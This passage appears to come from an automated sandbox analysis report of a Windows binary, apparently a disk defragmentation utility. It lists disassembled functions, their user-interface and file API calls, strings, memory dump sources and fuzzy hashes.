                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60d459dc24a125815d5dafe60fd6d4b8e488a7a08734036bff8a68fe5d906ce4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08712875A183509FC310CF68C844A5ABBE8FF89B20F158A5EF99897360D775E804CF92
                                                                                                                                                                                                                                                                                                Function 0042FDF0 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 331windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042FE87
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419480: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0041948D
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,?,00000002), ref: 0042FF25
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000083FE,?,?), ref: 0042FF79
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,?,00000002), ref: 0042FFF3
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,?,00000002), ref: 00430097
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403D70: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00403D7D
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000003), ref: 0043015F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419460: SendMessageW.USER32(?,0000100C,?,00000002), ref: 00419470
                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(?,open,explorer.exe,?,00000000,00000001), ref: 00430211
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CriticalEnterExecuteSectionShell
                                                                                                                                                                                                                                                                                                • String ID: /e,/select,"%s%s"$explorer.exe$open
                                                                                                                                                                                                                                                                                                • API String ID: 206244367-2061274879
                                                                                                                                                                                                                                                                                                • Opcode ID: 91b799c5c29bacec4ab38221025e1244b966e820090f97b19e20c9fa35e543cc
                                                                                                                                                                                                                                                                                                • Instruction ID: 62bdf63df222c89057064cae7919c1e413492940edc838130925d2253cd5f780
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91b799c5c29bacec4ab38221025e1244b966e820090f97b19e20c9fa35e543cc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80C1E5312043008BC710EF24D995B9BB7E5BF88704F500A7EF9499B296DB74ED49CB9A
                                                                                                                                                                                                                                                                                                Function 0040FCA0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 189windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040FD1F
                                                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 0040FD37
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040FD46
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0040FDC3
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 0040FE29
                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0040FE38
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000120F,?,00000000), ref: 0040FE6C
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000120B,00000000,?), ref: 0040FE82
                                                                                                                                                                                                                                                                                                • RectVisible.GDI32(?,?), ref: 0040FEAC
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$ClientRect$CursorObjectScreenVisible
                                                                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                                                                • API String ID: 883400287-2564639436
                                                                                                                                                                                                                                                                                                • Opcode ID: e58942ff4a5daa3b07d53de4812bd48be39c791cdb0435b4f276cefe3218f9a6
                                                                                                                                                                                                                                                                                                • Instruction ID: e57791d17a927b35fa3e7b028ca1617c0da729b9688da5cd3a54cba97037c013
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e58942ff4a5daa3b07d53de4812bd48be39c791cdb0435b4f276cefe3218f9a6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB8119B11083819FD325DF65C984F9BB7E8FF88704F004A2DF58997291EB74A944CB96
                                                                                                                                                                                                                                                                                                Function 0042D9D0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 172windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0042DA84
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 0042DAAE
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0042DAD4
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 0042DAF2
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0042DB00
                                                                                                                                                                                                                                                                                                • FillRect.USER32(?,?,?), ref: 0042DB38
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042DBBE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • ColorIndex, xrefs: 0042DA3E
                                                                                                                                                                                                                                                                                                • DiskDefrag\Setting Option\Gereral\DefragColor, xrefs: 0042DA43
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreateRect$BitmapClientFillMessageObjectSelectSend
                                                                                                                                                                                                                                                                                                • String ID: ColorIndex$DiskDefrag\Setting Option\Gereral\DefragColor
                                                                                                                                                                                                                                                                                                • API String ID: 24576784-1631410767
                                                                                                                                                                                                                                                                                                • Opcode ID: 413f7938cfa32640085c5d27a34cebb069bf0ab9b2ff2f1bc307b4aa97a93b27
                                                                                                                                                                                                                                                                                                • Instruction ID: 821a5ab27c6a8f9e6b02cc0ac72b1b3995420b0d805852c9f35119affff3cd9f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 413f7938cfa32640085c5d27a34cebb069bf0ab9b2ff2f1bc307b4aa97a93b27
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2617EB1608340AFC304DF68D884E5BB7E8FF88714F408A2EF59997291DB74E944CB96
                                                                                                                                                                                                                                                                                                Function 00456AB0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00456B14
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00454290: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00454306
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 00456B57
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 00456B7E
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 00456BA5
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00000000), ref: 00456BD6
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000001,00000000), ref: 00456C07
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000001,00000001), ref: 00456C38
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00456C5F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandle$CreateFileUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID: \\.\C:
                                                                                                                                                                                                                                                                                                • API String ID: 1066634676-259948872
                                                                                                                                                                                                                                                                                                • Opcode ID: 39a1f70db7202d3b1c3ce52b526e9e0b0aae69084ae2661cf5f3dced9512c8e9
                                                                                                                                                                                                                                                                                                • Instruction ID: 9c2aacaccead671dbc3a96f70d0e1eab3c71fbf61e1a23b3dd7d7caf89dd1f7c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39a1f70db7202d3b1c3ce52b526e9e0b0aae69084ae2661cf5f3dced9512c8e9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C75109377043006BD214AF69AC86BAEB394EF9C725F80013FF509D3282DA255548C7AB
                                                                                                                                                                                                                                                                                                Function 00422890 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 139windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadMenuW.USER32(00000000), ref: 004228FF
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000004,00000000), ref: 0042292A
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(1088D068), ref: 00422945
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Menu$CursorLoad
                                                                                                                                                                                                                                                                                                • String ID: 3401032$3401033$3401086$3401087$3401088$[SSD]
                                                                                                                                                                                                                                                                                                • API String ID: 3043871728-3947735280
                                                                                                                                                                                                                                                                                                • Opcode ID: 12aba4a97e714f3a74ed8847fff63567ff0577a5bbd9ac9787f27e08b8126eff
                                                                                                                                                                                                                                                                                                • Instruction ID: c9e3dbd840687df198e490246c1b34f6b1a62d60348da21d10426e52b8988a23
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12aba4a97e714f3a74ed8847fff63567ff0577a5bbd9ac9787f27e08b8126eff
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B4196F17543006AD764EB64DC42F9F72A8AF84B10F20C91FB65EA26C0CEBC640547AD
                                                                                                                                                                                                                                                                                                Function 0042EA80 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0042EAE3
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 0042EAF7
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 0042EB36
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402007$3402033$3402037$3402038$3402039$3402040
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3173017236
                                                                                                                                                                                                                                                                                                • Opcode ID: 6cbccfbbc1fd63c8a78153f1b809b30710d94fdfea326ecc7c254d81bae311d8
                                                                                                                                                                                                                                                                                                • Instruction ID: f302c9e8cacf912969436f53e573b816ab0f893bb8e7c3a9347613e7e3a9d812
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cbccfbbc1fd63c8a78153f1b809b30710d94fdfea326ecc7c254d81bae311d8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0021D7F0BE074035E6B5BA614D43FEE21295F84F49F20880BB75E7A9C2CADC3941629D
                                                                                                                                                                                                                                                                                                Function 004537A0 Relevance: 15.3, APIs: 10, Instructions: 287COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0045382E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
